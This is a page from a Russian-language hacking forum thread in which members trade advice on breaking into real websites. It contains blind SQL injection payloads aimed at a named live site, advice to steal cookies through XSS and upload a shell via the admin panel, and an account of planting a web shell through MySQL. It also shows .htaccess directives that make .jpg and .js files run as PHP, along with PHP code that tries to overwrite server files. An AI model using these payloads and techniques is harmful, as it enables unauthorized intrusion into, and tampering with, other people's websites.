Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 1068 of 1207
  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Смотря какая ситуация, если редиректит при sql-иньекции то может редиректить на вывод или тру результат, обьесни конкретную ситуацию...
     
    _________________________
    #21341 winstrool, 8 Nov 2012
  2. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    917
    Likes Received:
    492
    Reputations:
    724
    90% что нужно использовать extravalue()
     
    _________________________
    #21342 VY_CMa, 8 Nov 2012
  3. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Вообщем есть сайт:

    Если изменить id на несуществующий - редирект на index.php.
    Так же если начать раскручивать инъецию происходит редирект, даже если все верно.
     
    #21343 MaxFast, 8 Nov 2012
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Если версия Мускула < 5.1 то 0%

    В твоём случае редирект является индикатором правильности запроса. Так как у тебя инъекция в where строй правильную логику запроса.

    Например

    Code:
    http://www.igorkuljeric.com/news.php?kat_id=163+and+1=1    Нет редиректа

http://www.igorkuljeric.com/news.php?kat_id=163+and+1=2    Есть редирект
    Да, и в твоём случае вывода нет.

    _ttp://www.igorkuljeric.com/news.php?kat_id=163+and+1=2+union+select+222

    Так что только через Blind-SQL injection

    _ttp://www.igorkuljeric.com/news.php?kat_id=163+and+substring((@@version),1,1)=5
     
    _________________________
    #21344 BigBear, 9 Nov 2012
  5. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    есть сайт с xss уязвимостью. Можно через нее на сайт шэлл залить?
     
    #21345 wanttoask, 9 Nov 2012
  6. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Воруй печенья, иди в админку, лей шелл.
     
    #21346 MaxFast, 9 Nov 2012
  7. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    А можно подробнее? я с xss пока не очень дружу.
     
    #21347 wanttoask, 9 Nov 2012
  8. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    киньте какую-нибудь статейку по xss
     
    #21348 wanttoask, 9 Nov 2012
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    читай
    http://forum.antichat.ru/thread322832.html
     
    #21349 qaz, 9 Nov 2012
  10. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    https://forum.antichat.ru/thread20140.html
     
    _________________________
    #21350 kingbeef, 9 Nov 2012
  11. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    У меня в браузере хсс не отображается(не показывает окошко алерт) но ie пишет: возможность межсайтового скриптинга заблокирована. Что сделать чтобы окошко изобразилось?
     
    #21351 wanttoask, 9 Nov 2012
  12. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    В хроме
     
    #21352 wanttoask, 9 Nov 2012
  13. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    В хроме и ie>8 не работают пасивные из-за фильтров.
     
    _________________________
    #21353 kingbeef, 9 Nov 2012
  14. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    А можно их отключить?
     
    #21354 wanttoask, 9 Nov 2012
  15. wanttoask

    wanttoask New Member

    Joined:
    30 Sep 2012
    Messages:
    81
    Likes Received:
    1
    Reputations:
    0
    Кому не жалко, скиньте какой нить сайт с SQL инъекцией.
     
    #21355 wanttoask, 9 Nov 2012
  16. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    да хоть милион http://forum.antichat.ru/thread21336.html
     
    #21356 qaz, 9 Nov 2012
  17. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такая проблема, залил шелл через майскул, в .htaccess запрешено в этой деректории(картинки) использовать php, залил глебже в дерикторию .htaccess с содержимым
    AddType application/x-httpd-php .js AddHandler application/x-httpd-php .js
    AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg

    в итоге файлы в форматах .jpg и .js выполняют php, после долгих мучений от того что ничего не получалось я додумался посмотреть phpinfo(); и увидел приичину моих бед allow_url_fopen Off что блин ешо можно придумать?
     
    #21357 qaz, 9 Nov 2012
  18. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    ты же говоришь, что твои шеллы с .js и .jpg расширением исполняются как php. В чем проблема то?
     
    #21358 попугай, 9 Nov 2012
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    я не могу изменьть инфу в файлах которые находятся выше по каталогу

    например

    выполняю код

    PHP:
    $a file_get_contents("../.htaccess"); echo $a;
    показывает Deny from all

    далее выполняю код

    PHP:
    file_put_contents("../.htaccess","AddType application/x-httpd-php .js AddHandler application/x-httpd-php .js
     AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg"    ); 
    реакции ноль


    также

    PHP:
    file_put_contents("../../index.php","aaa"); 
    реакции ноль, правятся только те файлы что лежат в етом же каталоге
     
    #21359 qaz, 9 Nov 2012
  20. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    В общем возникла ситуация, получил доступ в админку в управление файлами смог спокойно загрузить свой php shell, но возникает проблема, при обращение по прямой ссылке предлагает скачать файл, попытался загрузить .htacces в ответ получил, такое сообщение: "Произошла ошибка!
    - Название файла не соответствует шаблону <name.ext>."
    Есть идеи?
     
    #21360 kacergei, 10 Nov 2012
(You must log in or sign up to post here.)
Page 1068 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.